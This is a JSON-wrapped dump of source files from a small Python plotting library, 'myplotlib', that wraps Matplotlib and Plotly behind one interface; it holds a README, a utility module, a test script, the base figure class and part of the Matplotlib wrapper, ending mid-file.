[ { "alpha_fraction": 0.6240126490592957, "alphanum_fraction": 0.7266982793807983, "avg_line_length": 26.521739959716797, "blob_id": "0494040012802d2f7b11f1352b3970c16ebeee6c", "content_id": "94cfd116b32e637d2810085133bcab3b3e866da6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 633, "license_type": "permissive", "max_line_length": 76, "num_lines": 23, "path": "/myplotlib/utils.py", "repo_name": "SengerM/myplotlib", "src_encoding": "UTF-8", "text": "from time import sleep\nimport datetime\n\ndef get_timestamp():\n\t\"\"\"\n\tReturns a numeric string with a timestamp. It also halts the execution \n\tof the program during 10 micro seconds to ensure that all returned\n\ttimestamps are different and unique.\n\t\n\tReturns\n\t-------\n\tstr\n\t\tString containing the timestamp. Format isYYYYMMDDHHMMSSmmmmmm.\n\t\n\tExample\n\t-------\t\n\t>>> get_timestamp()\n\t'20181013234913378084'\n\t>>> [get_timestamp(), get_timestamp()]\n\t['20181013235501158401', '20181013235501158583']\n\t\"\"\"\n\tsleep(10e-6) # This ensures that there will not exist two equal timestamps.\n\treturn datetime.datetime.now().strftime('%Y%m%d%H%M%S%f')\n" }, { "alpha_fraction": 0.7143433690071106, "alphanum_fraction": 0.7220093011856079, "avg_line_length": 38.341270446777344, "blob_id": "7d1f3a7e8f4ae89dfde0a741c7a7de0f6d6cef23", "content_id": "7547af3cc2fd1057434e1a19b33bb6d6dd787e08", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4959, "license_type": "permissive", "max_line_length": 392, "num_lines": 126, "path": "/README.md", "repo_name": "SengerM/myplotlib", "src_encoding": "UTF-8", "text": "# myplotlib\n\n**This is deprecated. Use [grafica](https://github.com/SengerM/grafica) instead.**\n\nMy personal unified interfase for doing plots. The idea is to implement the same interface (at least for basic stuff) for many plotting packages. Currently supports Matplotlib and Plotly.\n\n- Matplotlib is the best if you want to end up with a single image (png, pdf) to \"print\" (or just embed in a PDF).\n- Plotly is far better for doing interactive plots, visualize and share them. \n\nSo each package has its own advantages and disadvantages, and they have very different interfases which is a pain. With this package I intend to produce a simple and unified interface for any plotting package that may exist in the universe, so I only have to worry about plotting and all the bureaucracy to produce the plot with this or that package is done in the shadows by ```myplotlib```.\n\n## Installation\n\nIf you have pip (or pip3) installed, just run\n\n```\npip3 install git+https://github.com/SengerM/myplotlib\n```\nOtherwise, check how to install a package hosted in a GitHub repository with your Python package manager.\n\nYou will also need to [install matplotlib](https://matplotlib.org/users/installing.html#installing-an-official-release) (```pip install matplotlib```) and [install plotly](https://plotly.com/python/getting-started/#installation) (```pip install plotly```).\n\n## Example\n\nThe next example shows a simple usage case and as you can see the same code is used both for Plotly and for Matplotlib.:\n\n```Python\nimport myplotlib as mpl # Easy import.\nimport numpy as np\n\nx_data = np.linspace(-1,1)\nrandom_data = np.random.randn(999)\n\nfor package in ['plotly', 'matplotlib']: # Use the same code for both packages!\n\tfig1 = mpl.manager.new(\n\t\ttitle = 'A nice plot',\n\t\tsubtitle = 'Mathematical functions',\n\t\txlabel = 'x axis',\n\t\tylabel = 'y axis',\n\t\tshow_title = False, # This hides the title from the plot, but still uses this title for saving the file if you call \"mpl.manager.save_all\".\n\t\tpackage = package, # Choose between Matplotlib/Plotly.\n\t)\n\tfig1.plot(\n\t\tx_data,\n\t\tx_data**2,\n\t\tlabel = 'x²',\n\t\tmarker = '.',\n\t)\n\tfig1.plot(\n\t\tx_data,\n\t\tx_data**3,\n\t\tlabel = 'x³',\n\t\tcolor = (0,0,0), # Color is specified as an RGB tuple.\n\t\tlinestyle = 'dashed',\n\t)\n\n\thistogram = mpl.manager.new(\n\t\ttitle = 'This is a histogram',\n\t\tsubtitle = 'Data distribution',\n\t\txlabel = 'Whatever this is',\n\t\tylabel = 'Number of occurrences',\n\t\tpackage = package, # Choose between Matplotlib/Plotly.\n\t)\n\thistogram.hist(\n\t\trandom_data,\n\t\tlabel = 'My data',\n\t\tcolor = (1,.2,.2),\n\t\tbins = 99, # Set the number of bins. Any value compatible with Numpy's histogram function should work here, see https://numpy.org/doc/stable/reference/generated/numpy.histogram.html.\n\t)\n\nmpl.manager.save_all( # Save all the figures.\n\tformat = 'pdf', # Matplotlib figures will be saved in PDF, Plotly figures will be saved in HTML (interactive).\n\tmkdir = 'directory with figures', # If no directory is specified, a directory with the name of the script is created.\n)\n\nmpl.manager.save_all() # Creates a directory and saves all the figures automatically.\nmpl.manager.show() # Show all the figures.\n```\n\nColormaps can be plotted with Matplotlib, Plotly and also with [SAOImageDS9](https://sites.google.com/cfa.harvard.edu/saoimageds9) which is really cool to play with the scale of the colormap. This last option is very useful for images. Below there is an example:\n\n```Python\nimport myplotlib as mpl\nimport numpy as np\n\nx = np.linspace(-2,2)\ny = np.linspace(-1,1)\n\nxx,yy = np.meshgrid(x,y)\nzz = xx*yy**2\n\nfor package in ['matplotlib', 'plotly', 'ds9']:\n\tcolormap_figure = mpl.manager.new(\n\t\ttitle = 'Colormap',\n\t\txlabel = 'x axis',\n\t\tylabel = 'y axis',\n\t\tpackage = package,\n\t)\n\tcolormap_figure.colormap(\n\t\tx = xx,\n\t\ty = yy,\n\t\tz = zz,\n\t\tcolorscalelabel = 'z value',\n\t)\nmpl.manager.save_all()\nmpl.manager.show()\n\n```\n\n![The same code produced the three plots!](doc/1.png?raw=true \"Colormaps\")\n\n### More examples\n\nYou can find more examples in the [tests directory](https://github.com/SengerM/myplotlib/tree/master/tests).\n\n## Implemented types of plots\n\nCurrently this package has implemented the following methods:\n\n- ```figure.plot```. Implemented for plotly and matplotlib. Produce x,y plots given two arrays ```x_values``` and ```y_values```.\n- ```figure.hist```. Implemented for plotly and myplotlib. Given an array ```values``` produces a histogram.\n- ```figure.colormap```. Implemented for plotly, matplotlib and ds9. Given matrices ```x_values```, ```y_values``` and ```z_values``` produces a colormap.\n- ```figure.contour```. Implemented for plotly and matplotlib. Same as ```colormap``` but with contour lines.\n- ```figure.fill_between```. Implemented for matplotlib. Produces a \"band plot\", useful for plotting with errors in y.\n\nWARNING: I may forget to update this list. Today is 24.feb.2021. You can see examples in the [tests directory](https://github.com/SengerM/myplotlib/tree/master/tests).\n" }, { "alpha_fraction": 0.5375886559486389, "alphanum_fraction": 0.5617021322250366, "avg_line_length": 17.076923370361328, "blob_id": "9a4f8b0f0122b6a466e42633d7dc74e754207e7c", "content_id": "de9647341364c4b009aeef83afdf45acf495ad2a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 705, "license_type": "permissive", "max_line_length": 72, "num_lines": 39, "path": "/tests/test_error_band.py", "repo_name": "SengerM/myplotlib", "src_encoding": "UTF-8", "text": "import myplotlib as mpl\nimport numpy as np\n\ndef calc_error(y):\n\treturn ((y**2)**.5)*.1 + max(y*.01)\n\nx = np.linspace(-1,1)\ny = [\n\tx**3,\n\tnp.cos(x),\n\tx**2,\n\tnp.exp(x),\n\tx,\n\t2*x,\n\t3*(x**2)**.5,\n\t-x,\n\tnp.log(x**2)/8,\n]\n\nfor package in ['plotly']:\n\tfig = mpl.manager.new(\n\t\ttitle = f'Fill between with {package}',\n\t\tsubtitle = f'This is a test',\n\t\txlabel = 'x axis',\n\t\tylabel = 'y axis',\n\t\tpackage = package,\n\t)\n\tfor idx,yy in enumerate(y):\n\t\tfig.error_band(\n\t\t\tx,\n\t\t\tyy,\n\t\t\tyy + calc_error(yy),\n\t\t\tyy - calc_error(yy),\n\t\t\tlabel = f'Function {idx}',\n\t\t\tmarker = [None,'.','+','o','x'][np.random.randint(4)],\n\t\t\tlinestyle = ['solid', 'none','dashed','doted'][np.random.randint(3)],\n\t\t)\n\nmpl.manager.save_all()\n" }, { "alpha_fraction": 0.6743085384368896, "alphanum_fraction": 0.6810712218284607, "avg_line_length": 36.623409271240234, "blob_id": "d5844dfcc64df9c450675d306243d16ddeb80d9a", "content_id": "daaa39c6ad46dc494d7dc4f2216dbe2a44dfa796", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14803, "license_type": "permissive", "max_line_length": 259, "num_lines": 393, "path": "/myplotlib/figure.py", "repo_name": "SengerM/myplotlib", "src_encoding": "UTF-8", "text": "import numpy as np\nimport warnings\nfrom shutil import copyfile\nimport plotly.graph_objects as go\n\nclass MPLFigure:\n\t\"\"\"\n\tThis class defines the interface to be implemented in the subclasses\n\tand does all the validation of arguments. For example \"title\" must\n\tbe a string, this is validated in this class. How to write the title\n\tin the figure is to be implemented in the respective subclass for\n\tsome particular ploting package, not here.\n\tConvention for getting/setting the properties:\n\t- Each property (e.g. title) has to be defined with 3 @property methods,\n\t 1) title\n\t 2) _title getter\n\t 3) _title setter\n\tSee the definition of title for implementation details.\n\t\"\"\"\n\tDEFAULT_COLORS = [\n\t\t(255, 59, 59),\n\t\t(52, 71, 217),\n\t\t(4, 168, 2),\n\t\t(224, 146, 0),\n\t\t(224, 0, 183),\n\t\t(0, 230, 214),\n\t\t(140, 0, 0),\n\t\t(9, 0, 140),\n\t\t(107, 0, 96),\n\t]\n\tDEFAULT_COLORS = [tuple(np.array(color)/255) for color in DEFAULT_COLORS]\n\n\tdef pick_default_color(self):\n\t\t# ~ global DEFAULT_COLORS\n\t\tcolor = self.DEFAULT_COLORS[0]\n\t\tself.DEFAULT_COLORS = self.DEFAULT_COLORS[1:] + [self.DEFAULT_COLORS[0]]\n\t\treturn color\n\t\n\tdef __init__(self):\n\t\tself._show_title = True\n\t\n\t@property\n\tdef title(self):\n\t\treturn self._title\n\t@property\n\tdef _title(self):\n\t\tif hasattr(self, '_title_'):\n\t\t\treturn self._title_\n\t\telse:\n\t\t\treturn None\n\t@_title.setter\n\tdef _title(self, value: str):\n\t\tif not isinstance(value, str):\n\t\t\traise TypeError(f'<_title> must be a string, but received <{value}> of type {type(value)}.')\n\t\tself._title_ = value\n\t\n\t@property\n\tdef show_title(self):\n\t\treturn self._show_title\n\t@property\n\tdef _show_title(self):\n\t\treturn self._show_title_\n\t@_show_title.setter\n\tdef _show_title(self, value):\n\t\tif value not in [True, False]:\n\t\t\traise ValueError(f'<_show_title> must be either True or False, received <{value}> of type {type(value)}.')\n\t\tself._show_title_ = value\n\t\n\t@property\n\tdef subtitle(self):\n\t\treturn self._subtitle\n\t@property\n\tdef _subtitle(self):\n\t\tif hasattr(self, '_subtitle_'):\n\t\t\treturn self._subtitle_\n\t\telse:\n\t\t\treturn None\n\t@_subtitle.setter\n\tdef _subtitle(self, value: str):\n\t\tif not isinstance(value, str):\n\t\t\traise TypeError(f'<_subtitle> must be a string, but received <{value}> of type {type(value)}.')\n\t\tself._subtitle_ = value\n\t\n\t@property\n\tdef xlabel(self):\n\t\treturn self._xlabel\n\t@property\n\tdef _xlabel(self):\n\t\tif hasattr(self, '_xlabel_'):\n\t\t\treturn self._xlabel_\n\t\telse:\n\t\t\treturn None\n\t@_xlabel.setter\n\tdef _xlabel(self, value: str):\n\t\tif not isinstance(value, str):\n\t\t\traise TypeError(f'<_xlabel> must be a string, but received <{value}> of type {type(value)}.')\n\t\tself._xlabel_ = value\n\t\n\t@property\n\tdef ylabel(self):\n\t\treturn self._ylabel\n\t@property\n\tdef _ylabel(self):\n\t\tif hasattr(self, '_ylabel_'):\n\t\t\treturn self._ylabel_\n\t\telse:\n\t\t\treturn None\n\t@_ylabel.setter\n\tdef _ylabel(self, value: str):\n\t\tif not isinstance(value, str):\n\t\t\traise TypeError(f'<_ylabel> must be a string, but received <{value}> of type {type(value)}.')\n\t\tself._ylabel_ = value\n\t\n\t@property\n\tdef xscale(self):\n\t\treturn self._xscale\n\t@property\n\tdef _xscale(self):\n\t\tif hasattr(self, '_xscale_'):\n\t\t\treturn self._xscale_\n\t\telse:\n\t\t\treturn None\n\t@_xscale.setter\n\tdef _xscale(self, value: str):\n\t\tif not isinstance(value, str):\n\t\t\traise TypeError(f'<_xscale> must be a string, but received <{value}> of type {type(value)}.')\n\t\tself._validate_axis_scale(value)\n\t\tself._xscale_ = value\n\t\n\t@property\n\tdef yscale(self):\n\t\treturn self._yscale\n\t@property\n\tdef _yscale(self):\n\t\tif hasattr(self, '_yscale_'):\n\t\t\treturn self._yscale_\n\t\telse:\n\t\t\treturn None\n\t@_yscale.setter\n\tdef _yscale(self, value: str):\n\t\tif not isinstance(value, str):\n\t\t\traise TypeError(f'<_yscale> must be a string, but received <{value}> of type {type(value)}.')\n\t\tself._validate_axis_scale(value)\n\t\tself._yscale_ = value\n\t\n\t@property\n\tdef aspect(self):\n\t\treturn self._aspect\n\t@property\n\tdef _aspect(self):\n\t\tif hasattr(self, '_aspect_'):\n\t\t\treturn self._aspect_\n\t\telse:\n\t\t\treturn None\n\t@_aspect.setter\n\tdef _aspect(self, value: str):\n\t\tif not isinstance(value, str):\n\t\t\traise TypeError(f'<_aspect> must be a string, but received <{value}> of type {type(value)}.')\n\t\tself._validate_aspect(value)\n\t\tself._aspect_ = value\n\t\n\tdef set(self, **kwargs):\n\t\tfor key in kwargs.keys():\n\t\t\tif not hasattr(self, f'_{key}'):\n\t\t\t\traise ValueError(f'Cannot set <{key}>, invalid property.')\n\t\t\tsetattr(self, f'_{key}', kwargs[key])\n\t\n\tdef show(self):\n\t\traise NotImplementedError(f'The <show> method is not implemented yet for the plotting package you are using! (Specifically for the class {self.__class__.__name__}.)')\n\t\n\tdef save(self, fname=None, *args, **kwargs):\n\t\traise NotImplementedError(f'The <save> method is not implemented yet for the plotting package you are using! (Specifically for the class {self.__class__.__name__}.)')\n\t\n\tdef close(self):\n\t\traise NotImplementedError(f'The <close> method is not implemented yet for the plotting package you are using! (Specifically for the class {self.__class__.__name__}.)')\n\t\n\t#### Validation methods ↓↓↓↓\n\t\"\"\"\n\tThis methods validate arguments so we all speak the same language.\n\t\"\"\"\n\tdef _validate_axis_scale(self, scale: str):\n\t\t# Assume that <scale> is a string. Raises an error if \"scale\" is not a valid scale.\n\t\tvalid_scales = ['lin', 'log']\n\t\tif scale not in valid_scales:\n\t\t\traise ValueError(f'Axis scale must be one of {valid_scales}, received {scale}.')\n\t\n\tdef _validate_aspect(self, aspect: str):\n\t\t# Assuming that <aspect> is a string. Raises an error if it is not a valid option.\n\t\tvalid_aspects = ['equal']\n\t\tif aspect not in valid_aspects:\n\t\t\traise ValueError(f'<aspect> must be one of {valid_aspects}.')\n\t\n\tdef _validate_xy_are_arrays_of_numbers(self, x):\n\t\tif not hasattr(x, '__iter__'):\n\t\t\traise TypeError(f'<x> and <y> must be \"array-like\" objects, e.g. lists, numpy arrays, etc.')\n\t\n\tdef _validate_color(self, color):\n\t\ttry:\n\t\t\tcolor = tuple(color)\n\t\texcept:\n\t\t\traise TypeError(f'<color> must be an iterable composed of 3 numeric elements specifying RGB. Received {color} of type {type(color)}.')\n\t\tif len(color) != 3:\n\t\t\traise ValueError(f'<color> must be an iterable composed of 3 numeric elements specifying RGB. Received {color}.')\n\t\tfor rgb in color:\n\t\t\tif not 0 <= rgb <= 1:\n\t\t\t\traise ValueError(f'RGB elements in <color> must be bounded between 0 and 1, received <{color}>.')\n\t\n\tdef _validate_alpha(self, alpha):\n\t\ttry:\n\t\t\talpha = float(alpha)\n\t\texcept:\n\t\t\traise ValueError(f'<alpha> must be a float number. Received {alpha} of type {type(alpha)}.')\n\t\tif not 0 <= alpha <= 1:\n\t\t\traise ValueError(f'<alpha> must be bounded between 0 and 1, received <{alpha}>.')\n\t\n\tdef _validate_linewidth(self, linewidth):\n\t\ttry:\n\t\t\tlinewidth = float(linewidth)\n\t\texcept:\n\t\t\traise ValueError(f'<linewidth> must be a float number. Received {linewidth} of type {type(linewidth)}.')\n\t\n\tdef _validate_bins(self, bins):\n\t\tif isinstance(bins, int) and bins > 0:\n\t\t\treturn\n\t\telif hasattr(bins, '__iter__') and len(bins) > 0:\n\t\t\treturn\n\t\telif isinstance(bins, str):\n\t\t\treturn\n\t\telse:\n\t\t\traise TypeError(f'<bins> must be either an integer number, an array of float numbers or a string as defined for the numpy.histogram function, see https://numpy.org/doc/stable/reference/generated/numpy.histogram.html. Received {bins} of type {type(bins)}.')\n\t\n\tdef _validate_marker(self, marker):\n\t\tIMPLEMENTED_MARKERS = ['.', '+', 'x', 'o', None]\n\t\tif marker not in IMPLEMENTED_MARKERS:\n\t\t\traise ValueError(f'<marker> must be one of {IMPLEMENTED_MARKERS}, received \"{marker}\".')\n\t\n\tdef _validate_kwargs(self, **kwargs):\n\t\tif 'marker' in kwargs:\n\t\t\tself._validate_marker(kwargs['marker'])\n\t\tif kwargs.get('label') != None:\n\t\t\tif not isinstance(kwargs.get('label'), str):\n\t\t\t\traise TypeError(f'<label> must be a string.')\n\t\tif kwargs.get('color') != None:\n\t\t\tself._validate_color(kwargs['color'])\n\t\tif kwargs.get('alpha') != None:\n\t\t\tself._validate_alpha(kwargs['alpha'])\n\t\tif kwargs.get('linewidth') != None:\n\t\t\tself._validate_linewidth(kwargs['linewidth'])\n\t\tif kwargs.get('bins') is not None:\n\t\t\tself._validate_bins(kwargs['bins'])\n\t\tif kwargs.get('density') != None:\n\t\t\tif kwargs.get('density') not in [True, False]:\n\t\t\t\traise ValueError(f'<density> must be either True or False, received <{kwargs.get(\"density\")}>.')\n\t\tif 'norm' in kwargs:\n\t\t\tif kwargs['norm'] not in ['lin','log']:\n\t\t\t\traise ValueError(f'<norm> must be either \"lin\" or \"log\", received <{kwargs[\"norm\"]}> of type {type(kwargs[\"norm\"])}.')\n\t\n\t#### Plotting methods ↓↓↓↓\n\t\"\"\"\n\tPlotting methods here do not have to \"do the job\", they just validate\n\tthings and define the interface. Each subclass has to do the job.\n\tWhen implementing one of these plotting methods in a subclass, use\n\tthe same signature as here.\n\t\"\"\"\n\tdef plot(self, x, y=None, **kwargs):\n\t\tif 'plot' not in self.__class__.__dict__.keys(): # Raise error if the method was not overriden\n\t\t\traise NotImplementedError(f'<plot> not implemented for {type(self)}.')\n\t\timplemented_kwargs = ['label', 'marker', 'color', 'alpha', 'linestyle', 'linewidth'] # This is specific for the \"plot\" method.\n\t\tfor kwarg in kwargs.keys():\n\t\t\tif kwarg not in implemented_kwargs:\n\t\t\t\traise NotImplementedError(f'<{kwarg}> not implemented for <plot> by myplotlib.')\n\t\tself._validate_xy_are_arrays_of_numbers(x)\n\t\tif y is not None:\n\t\t\tself._validate_xy_are_arrays_of_numbers(y)\n\t\t\tif len(x) != len(y):\n\t\t\t\traise ValueError(f'Lengths of <x> and <y> are not the same, received len(x)={len(x)} and len(y)={len(y)}.')\n\t\telse:\n\t\t\ty = x\n\t\t\tx = [i for i in range(len(x))]\n\t\tif kwargs.get('color') is None:\n\t\t\tkwargs['color'] = self.pick_default_color()\n\t\tself._validate_kwargs(**kwargs)\n\t\tvalidated_args = kwargs\n\t\tvalidated_args['x'] = x\n\t\tvalidated_args['y'] = y\n\t\treturn validated_args\n\t\n\tdef hist(self, samples, **kwargs):\n\t\tif 'hist' not in self.__class__.__dict__.keys(): # Raise error if the method was not overriden\n\t\t\traise NotImplementedError(f'<hist> not implemented for {type(self)}.')\n\t\timplemented_kwargs = ['label', 'color', 'alpha', 'bins', 'density', 'linewidth', 'linestyle'] # This is specific for the \"hist\" method.\n\t\tfor kwarg in kwargs.keys():\n\t\t\tif kwarg not in implemented_kwargs:\n\t\t\t\traise NotImplementedError(f'<{kwarg}> not implemented for <hist> by myplotlib.')\n\t\tself._validate_xy_are_arrays_of_numbers(samples)\n\t\tif kwargs.get('color') is None:\n\t\t\tkwargs['color'] = self.pick_default_color()\n\t\tself._validate_kwargs(**kwargs)\n\t\t\n\t\tsamples = np.array(samples)\n\t\tcount, index = np.histogram(\n\t\t\tsamples[~np.isnan(samples)], \n\t\t\tbins = kwargs.get('bins') if kwargs.get('bins') is not None else 'auto',\n\t\t\tdensity = kwargs.get('density') if kwargs.get('density') != None else False,\n\t\t)\n\t\tcount = list(count)\n\t\tcount.insert(0,0)\n\t\tcount.append(0)\n\t\tindex = list(index)\n\t\tindex.insert(0,index[0] - np.diff(index)[0])\n\t\tindex.append(index[-1] + np.diff(index)[-1])\n\t\tindex += np.diff(index)[0]/2 # This is because np.histogram returns the bins edges and I want to plot in the middle.\n\t\t\n\t\tvalidated_args = kwargs\n\t\tvalidated_args['samples'] = samples\n\t\tvalidated_args['bins'] = index\n\t\tvalidated_args['counts'] = count\n\t\treturn validated_args\n\t\n\tdef colormap(self, z, x=None, y=None, **kwargs):\n\t\tif 'colormap' not in self.__class__.__dict__.keys(): # Raise error if the method was not overriden\n\t\t\traise NotImplementedError(f'<colormap> not implemented for {type(self)}.')\n\t\treturn self.validate_colormap_args(z=z, x=x, y=y, **kwargs)\n\t\n\tdef validate_colormap_args(self, z, x=None, y=None, **kwargs):\n\t\t# I had to wrote this function because \"contour\" validates the same arguments as \"colormap\", but calling \"self.colormap\" inside contour created problems calling the contour method of the subclasses.\n\t\timplemented_kwargs = ['alpha','norm', 'colorscalelabel'] # This is specific for the \"colormap\" method.\n\t\tfor kwarg in kwargs.keys():\n\t\t\tif kwarg not in implemented_kwargs:\n\t\t\t\traise NotImplementedError(f'<{kwarg}> not implemented for <colormap> by myplotlib.')\n\t\tself._validate_kwargs(**kwargs)\n\t\tvalidated_args = kwargs\n\t\tvalidated_args['x'] = x\n\t\tvalidated_args['y'] = y\n\t\tvalidated_args['z'] = z\n\t\treturn validated_args\n\t\n\tdef contour(self, z, x=None, y=None, **kwargs):\n\t\tif 'contour' not in self.__class__.__dict__.keys(): # Raise error if the method was not overriden\n\t\t\traise NotImplementedError(f'<contour> not implemented for {type(self)}.')\n\t\tif 'levels' in kwargs:\n\t\t\tlevels = kwargs['levels']\n\t\t\tif not isinstance(levels, int):\n\t\t\t\traise TypeError(f'<levels> must be an integer number specifying the number of levels for the contour plot, received {levels} of type {type(levels)}.')\n\t\tvalidated_args = self.validate_colormap_args(z, x, y, **kwargs) # Validate arguments according to the standards of myplotlib.\n\t\tif 'levels' in locals():\n\t\t\tvalidated_args['levels'] = levels\n\t\treturn validated_args\n\t\n\tdef fill_between(self, x, y1, y2=None, **kwargs):\n\t\tif 'fill_between' not in self.__class__.__dict__.keys(): # Raise error if the method was not overriden\n\t\t\traise NotImplementedError(f'<fill_between> not implemented for {type(self)}.')\n\t\timplemented_kwargs = ['label', 'color', 'alpha', 'linestyle', 'linewidth'] # This is specific for the \"fill_between\" method.\n\t\tfor kwarg in kwargs.keys():\n\t\t\tif kwarg not in implemented_kwargs:\n\t\t\t\traise NotImplementedError(f'<{kwarg}> not implemented for <fill_between> by myplotlib.')\n\t\tself._validate_xy_are_arrays_of_numbers(x)\n\t\tself._validate_xy_are_arrays_of_numbers(y1)\n\t\tif y2 is None:\n\t\t\ty2 = np.zeros(len(x))\n\t\tself._validate_xy_are_arrays_of_numbers(y2)\n\t\tif kwargs.get('color') is None:\n\t\t\tkwargs['color'] = self.pick_default_color()\n\t\tself._validate_kwargs(**kwargs)\n\t\tvalidated_args = kwargs\n\t\tvalidated_args['x'] = x\n\t\tvalidated_args['y1'] = y1\n\t\tvalidated_args['y2'] = y2\n\t\tvalidated_args['alpha'] = .5 # Default alpha value.\n\t\treturn validated_args\n\t\n\tdef error_band(self, x, y, ytop, ylow, **kwargs):\n\t\tif 'error_band' not in self.__class__.__dict__.keys(): # Raise error if the method was not overriden\n\t\t\traise NotImplementedError(f'<error_band> not implemented for {type(self)}.')\n\t\tself._validate_xy_are_arrays_of_numbers(x)\n\t\tself._validate_xy_are_arrays_of_numbers(y)\n\t\tself._validate_xy_are_arrays_of_numbers(ytop)\n\t\tself._validate_xy_are_arrays_of_numbers(ylow)\n\t\tif any(np.array(y)>np.array(ytop)) or any(np.array(y)<np.array(ylow)):\n\t\t\traise ValueError(f'Either y>ytop or y<ylow is true for at least one point, please check your arrays.')\n\t\tif len(x) == len(y) == len(ytop) == len(ylow):\n\t\t\tpass\n\t\telse:\n\t\t\traise ValueError(f'len(x) == len(y) == len(ytop) == len(ylow) is not True, please check your arrays.')\n\t\tif kwargs.get('color') is None:\n\t\t\tkwargs['color'] = self.pick_default_color()\n\t\tself._validate_kwargs(**kwargs)\n\t\tvalidated_args = kwargs\n\t\tvalidated_args['x'] = x\n\t\tvalidated_args['y'] = y\n\t\tvalidated_args['ytop'] = ytop\n\t\tvalidated_args['ylow'] = ylow\n\t\treturn validated_args\n\n" }, { "alpha_fraction": 0.6844843029975891, "alphanum_fraction": 0.6905969381332397, "avg_line_length": 48.92856979370117, "blob_id": "006b1ef9182a185e3055165ee94b564d7e5547ff", "content_id": "7bfb7cb494204f6959eb86c6ac17b3af8c5070ee", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7689, "license_type": "permissive", "max_line_length": 188, "num_lines": 154, "path": "/myplotlib/wrapper_matplotlib.py", "repo_name": "SengerM/myplotlib", "src_encoding": "UTF-8", "text": "from .figure import MPLFigure\nimport numpy as np\n\nclass MPLMatplotlibWrapper(MPLFigure):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\timport matplotlib.pyplot as plt # Import here so if the user does not plot with this package, it does not need to be installed.\n\t\timport matplotlib.colors as colors # Import here so if the user does not plot with this package, it does not need to be installed.\n\t\tself.matplotlib_plt = plt\n\t\tself.matplotlib_colors = colors\n\t\tfig, ax = plt.subplots()\n\t\tax.grid(b=True, which='minor', color='#000000', alpha=0.1, linestyle='-', linewidth=0.25)\n\t\tself.matplotlib_fig = fig\n\t\tself.matplotlib_ax = ax\n\t\n\tdef set(self, **kwargs):\n\t\tsuper().set(**kwargs) # This does a validation of the arguments and stores them in the properties of the super() figure.\n\t\tdel(kwargs) # Remove it to avoid double access to the properties. Now you must access like \"self.title\" and so.\n\t\tself.matplotlib_ax.set_xlabel(super().xlabel)\n\t\tself.matplotlib_ax.set_ylabel(super().ylabel)\n\t\tif self.xscale in [None, 'lin']:\n\t\t\tself.matplotlib_ax.set_xscale('linear')\n\t\telif self.xscale == 'log':\n\t\t\tself.matplotlib_ax.set_xscale('log')\n\t\tif self.yscale in [None, 'lin']:\n\t\t\tself.matplotlib_ax.set_yscale('linear')\n\t\telif self.yscale == 'log':\n\t\t\tself.matplotlib_ax.set_yscale('log')\n\t\tif self.title != None:\n\t\t\tself.matplotlib_fig.canvas.set_window_title(self.title)\n\t\t\tif self.show_title == True:\n\t\t\t\tself.matplotlib_fig.suptitle(self.title)\n\t\tif self.aspect == 'equal':\n\t\t\tself.matplotlib_ax.set_aspect('equal')\n\t\tif self.subtitle != None:\n\t\t\tself.matplotlib_ax.set_title(self.subtitle)\n\t\n\tdef show(self):\n\t\tself.matplotlib_plt.show()\n\t\n\tdef save(self, fname=None, *args, **kwargs):\n\t\tif fname is None:\n\t\t\tfname = self.title\n\t\tif fname is None:\n\t\t\traise ValueError(f'Please provide a name for saving the figure to a file by the <fname> argument.')\n\t\tif fname[-4] != '.': fname = f'{fname}.png'\n\t\tself.matplotlib_fig.savefig(facecolor=(1,1,1,0), fname=fname, *args, **kwargs)\n\t\n\tdef close(self):\n\t\tself.matplotlib_plt.close(self.matplotlib_fig)\n\t\n\tdef plot(self, x, y=None, **kwargs):\n\t\tvalidated_args = super().plot(x, y, **kwargs) # Validate arguments according to the standards of myplotlib.\n\t\tdel(kwargs) # Remove it to avoid double access to the properties.\n\t\tx = validated_args.get('x')\n\t\ty = validated_args.get('y')\n\t\tvalidated_args.pop('x')\n\t\tvalidated_args.pop('y')\n\t\tself.matplotlib_ax.plot(x, y, **validated_args)\n\t\tif validated_args.get('label') != None: # If you gave me a label it is obvious for me that you want to display it, no?\n\t\t\tself.matplotlib_ax.legend()\n\t\n\tdef hist(self, samples, **kwargs):\n\t\tvalidated_args = super().hist(samples, **kwargs) # Validate arguments according to the standards of myplotlib.\n\t\tdel(kwargs) # Remove it to avoid double access to the properties.\n\t\tvalidated_args['bins'] = np.array(validated_args['bins'][:-2]) + np.diff(validated_args['bins'])[:-1]/2 # This is to normalize the binning criteria with plotly.\n\t\tsamples = validated_args['samples']\n\t\tvalidated_args.pop('samples')\n\t\tvalidated_args.pop('counts') # Have no idea why I have to remove \"counts\", otherwise the next line raises a strange error.\n\t\tself.matplotlib_ax.hist(x = samples, histtype='step', **validated_args)\n\t\tif validated_args.get('label') != None: # If you provided a legend I assume you want to show it.\n\t\t\tself.matplotlib_ax.legend()\n\t\n\tdef hist2d(self, _______, **kwargs):\n\t\t# ~ validated_args = super().hist(samples, **kwargs) # Validate arguments according to the standards of myplotlib.\n\t\t# ~ del(kwargs) # Remove it to avoid double access to the properties.\n\t\traise NotImplementedError(f'<hist2d> not yet implemented for {self.__class__.__name__}')\n\t\n\tdef colormap(self, z, x=None, y=None, **kwargs):\n\t\tvalidated_args = super().colormap(z, x, y, **kwargs) # Validate arguments according to the standards of myplotlib.\n\t\tdel(kwargs) # Remove it to avoid double access to the properties.\n\t\tz = np.array(validated_args.get('z'))\n\t\tvalidated_args.pop('z')\n\t\tx = validated_args.get('x')\n\t\tvalidated_args.pop('x')\n\t\ty = validated_args.get('y')\n\t\tvalidated_args.pop('y')\n\t\tif validated_args.get('norm') in [None, 'lin']: # linear normalization\n\t\t\tvalidated_args['norm'] = self.matplotlib_colors.Normalize(vmin=np.nanmin(z), vmax=np.nanmax(z))\n\t\telif validated_args.get('norm') == 'log':\n\t\t\ttemp = np.squeeze(np.asarray(z))\n\t\t\twhile temp.min() <= 0:\n\t\t\t\ttemp = temp[temp!=temp.min()]\n\t\t\tif (z<=0).any():\n\t\t\t\tz[z<=0] = float('Nan')\n\t\t\t\twarnings.warn('Warning: log color scale was selected and there are <z> values <= 0. They will be replaced by float(\"inf\") values for plotting (i.e. they will not appear in the 